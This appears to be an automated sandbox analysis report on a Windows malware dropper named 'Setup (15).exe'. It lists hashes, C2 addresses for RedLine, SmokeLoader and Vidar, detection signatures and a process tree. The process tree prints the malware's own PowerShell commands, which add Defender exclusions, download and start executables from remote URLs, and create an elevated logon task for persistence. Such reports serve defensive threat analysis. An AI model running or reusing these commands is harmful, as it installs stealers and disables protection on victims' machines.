Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    733s
  • max time network
    1769s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    21-08-2021 10:21

General

  • Target

    Setup (15).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bc6269f31h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bcfeb5393h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120c8f91373ch?raw

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

@Gerhdhd

C2

46.8.19.177:41228

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 12 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 33 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 11 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 27 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 30 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 28 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious behavior: SetClipboardViewer 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:68
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1368
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2656
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2640
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
            • Suspicious use of SetThreadContext
            • Modifies registry class
            PID:2556
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k SystemNetworkService
              2⤵
              • Drops file in System32 directory
              • Checks processor information in registry
              PID:2272
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2336
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2328
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1788
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1244
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1188
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1080
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:684
                      • C:\Users\Admin\AppData\Local\Temp\Setup (15).exe
                        "C:\Users\Admin\AppData\Local\Temp\Setup (15).exe"
                        1⤵
                        • Checks computer location settings
                        • Modifies system certificate store
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:2256
                        • C:\Users\Admin\Documents\14PB4Qz126a5Sk3ehZRyGir7.exe
                          "C:\Users\Admin\Documents\14PB4Qz126a5Sk3ehZRyGir7.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:2496
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                            3⤵
                              PID:4552
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                4⤵
                                  PID:8056
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                  4⤵
                                    PID:8656
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                    4⤵
                                      PID:8956
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                      4⤵
                                        PID:4160
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                        4⤵
                                        • Blocklisted process makes network request
                                        PID:8956
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                        4⤵
                                        • Blocklisted process makes network request
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        PID:4356
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                        4⤵
                                          PID:8872
                                          • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                            "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                            5⤵
                                              PID:5208
                                              • C:\Windows\SYSTEM32\cmd.exe
                                                "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                6⤵
                                                • Modifies Internet Explorer settings
                                                PID:8396
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                  7⤵
                                                    PID:1092
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                    7⤵
                                                      PID:6164
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                      7⤵
                                                        PID:360
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                        7⤵
                                                          PID:9592
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                        6⤵
                                                          PID:6096
                                                          • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                            C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                            7⤵
                                                            • Drops file in System32 directory
                                                            PID:368
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                              8⤵
                                                                PID:1004
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                  9⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:9172
                                                              • C:\Windows\system32\services32.exe
                                                                "C:\Windows\system32\services32.exe"
                                                                8⤵
                                                                  PID:7052
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                    9⤵
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:4240
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                      10⤵
                                                                        PID:6588
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                        10⤵
                                                                          PID:6300
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                          10⤵
                                                                            PID:9380
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                            10⤵
                                                                              PID:9628
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                            9⤵
                                                                              PID:6224
                                                                              • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                10⤵
                                                                                • Drops file in System32 directory
                                                                                PID:8200
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                  11⤵
                                                                                    PID:7340
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                      12⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:7696
                                                                                  • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                                    "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                                    11⤵
                                                                                      PID:6548
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                      11⤵
                                                                                        PID:4928
                                                                                        • C:\Windows\system32\choice.exe
                                                                                          choice /C Y /N /D Y /T 3
                                                                                          12⤵
                                                                                            PID:4160
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                    8⤵
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:8788
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      9⤵
                                                                                        PID:4884
                                                                                      • C:\Windows\system32\choice.exe
                                                                                        choice /C Y /N /D Y /T 3
                                                                                        9⤵
                                                                                          PID:8896
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                4⤵
                                                                                  PID:8472
                                                                                  • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                    5⤵
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                    PID:1112
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                  4⤵
                                                                                    PID:8056
                                                                                    • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                      5⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:6868
                                                                                      • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                        "{path}"
                                                                                        6⤵
                                                                                          PID:2152
                                                                                        • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                          "{path}"
                                                                                          6⤵
                                                                                            PID:5684
                                                                                  • C:\Users\Admin\Documents\GR1VugA08ZJAfTkWZUckPtj5.exe
                                                                                    "C:\Users\Admin\Documents\GR1VugA08ZJAfTkWZUckPtj5.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2152
                                                                                    • C:\Users\Admin\Documents\GR1VugA08ZJAfTkWZUckPtj5.exe
                                                                                      "C:\Users\Admin\Documents\GR1VugA08ZJAfTkWZUckPtj5.exe"
                                                                                      3⤵
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:9184
                                                                                  • C:\Users\Admin\Documents\ZQ2ncVW4RF8nJOj0Ddhs07ey.exe
                                                                                    "C:\Users\Admin\Documents\ZQ2ncVW4RF8nJOj0Ddhs07ey.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:1736
                                                                                    • C:\Users\Admin\Documents\ZQ2ncVW4RF8nJOj0Ddhs07ey.exe
                                                                                      C:\Users\Admin\Documents\ZQ2ncVW4RF8nJOj0Ddhs07ey.exe
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4864
                                                                                  • C:\Users\Admin\Documents\SKTsnAXG8vvHmLG5XEfEC9OK.exe
                                                                                    "C:\Users\Admin\Documents\SKTsnAXG8vvHmLG5XEfEC9OK.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2728
                                                                                    • C:\Users\Admin\AppData\Roaming\1281240.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\1281240.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      PID:4744
                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5156
                                                                                    • C:\Users\Admin\AppData\Roaming\8112057.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\8112057.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4052
                                                                                    • C:\Users\Admin\AppData\Roaming\3810965.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\3810965.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:740
                                                                                  • C:\Users\Admin\Documents\LkWj_WyNx5YoYFbp4Wt2VolU.exe
                                                                                    "C:\Users\Admin\Documents\LkWj_WyNx5YoYFbp4Wt2VolU.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2492
                                                                                  • C:\Users\Admin\Documents\gcAy9AVeGQN4o9OIAmFvaJOs.exe
                                                                                    "C:\Users\Admin\Documents\gcAy9AVeGQN4o9OIAmFvaJOs.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:2368
                                                                                    • C:\Users\Admin\Documents\gcAy9AVeGQN4o9OIAmFvaJOs.exe
                                                                                      C:\Users\Admin\Documents\gcAy9AVeGQN4o9OIAmFvaJOs.exe
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4824
                                                                                    • C:\Users\Admin\Documents\gcAy9AVeGQN4o9OIAmFvaJOs.exe
                                                                                      C:\Users\Admin\Documents\gcAy9AVeGQN4o9OIAmFvaJOs.exe
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5008
                                                                                  • C:\Users\Admin\Documents\JJQcdndAN8f3TkHFzZ_xk8vN.exe
                                                                                    "C:\Users\Admin\Documents\JJQcdndAN8f3TkHFzZ_xk8vN.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2160
                                                                                  • C:\Users\Admin\Documents\hkFeB5gNl6EJoQW15QOy2c78.exe
                                                                                    "C:\Users\Admin\Documents\hkFeB5gNl6EJoQW15QOy2c78.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2096
                                                                                  • C:\Users\Admin\Documents\AhN_TNqLuOPVdxPNvuxmKjHO.exe
                                                                                    "C:\Users\Admin\Documents\AhN_TNqLuOPVdxPNvuxmKjHO.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2608
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 764
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:5332
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 796
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:6084
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 848
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:5536
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 956
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:4760
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 984
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Program crash
                                                                                      PID:5284
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 1048
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:5864
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 1352
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:5712
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 1320
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:3408
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 908
                                                                                      3⤵
                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                      • Program crash
                                                                                      PID:6444
                                                                                  • C:\Users\Admin\Documents\tI9pbWTEBhzgFw9Z4CixGAk7.exe
                                                                                    "C:\Users\Admin\Documents\tI9pbWTEBhzgFw9Z4CixGAk7.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1868
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 660
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1288
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 676
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2252
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 680
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3944
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 700
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:5256
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 1112
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:5424
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 1160
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:5248
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 1104
                                                                                      3⤵
                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                      • Program crash
                                                                                      PID:504
                                                                                  • C:\Users\Admin\Documents\cM2NJ_cqyB8HVp1XaEl2jilT.exe
                                                                                    "C:\Users\Admin\Documents\cM2NJ_cqyB8HVp1XaEl2jilT.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2816
                                                                                    • C:\Users\Admin\Documents\cM2NJ_cqyB8HVp1XaEl2jilT.exe
                                                                                      "C:\Users\Admin\Documents\cM2NJ_cqyB8HVp1XaEl2jilT.exe" -q
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4424
                                                                                  • C:\Users\Admin\Documents\0FRtchEG_mhMyuOgsBCdYwYf.exe
                                                                                    "C:\Users\Admin\Documents\0FRtchEG_mhMyuOgsBCdYwYf.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:2244
                                                                                    • C:\Users\Admin\Documents\0FRtchEG_mhMyuOgsBCdYwYf.exe
                                                                                      C:\Users\Admin\Documents\0FRtchEG_mhMyuOgsBCdYwYf.exe
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4840
                                                                                  • C:\Users\Admin\Documents\tbQlRGCUzeiRqg_l8sNH1kXn.exe
                                                                                    "C:\Users\Admin\Documents\tbQlRGCUzeiRqg_l8sNH1kXn.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:1852
                                                                                  • C:\Users\Admin\Documents\pf8PCPV38YE4y9b9ET1UjiRT.exe
                                                                                    "C:\Users\Admin\Documents\pf8PCPV38YE4y9b9ET1UjiRT.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2876
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-2HUVS.tmp\pf8PCPV38YE4y9b9ET1UjiRT.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-2HUVS.tmp\pf8PCPV38YE4y9b9ET1UjiRT.tmp" /SL5="$10204,138429,56832,C:\Users\Admin\Documents\pf8PCPV38YE4y9b9ET1UjiRT.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:4232
                                                                                  • C:\Users\Admin\Documents\NPxJloRKeTIoURgFj2QxDIWQ.exe
                                                                                    "C:\Users\Admin\Documents\NPxJloRKeTIoURgFj2QxDIWQ.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2524
                                                                                  • C:\Users\Admin\Documents\Sf2adyyPKzxjWq4ANZnq7b3v.exe
                                                                                    "C:\Users\Admin\Documents\Sf2adyyPKzxjWq4ANZnq7b3v.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
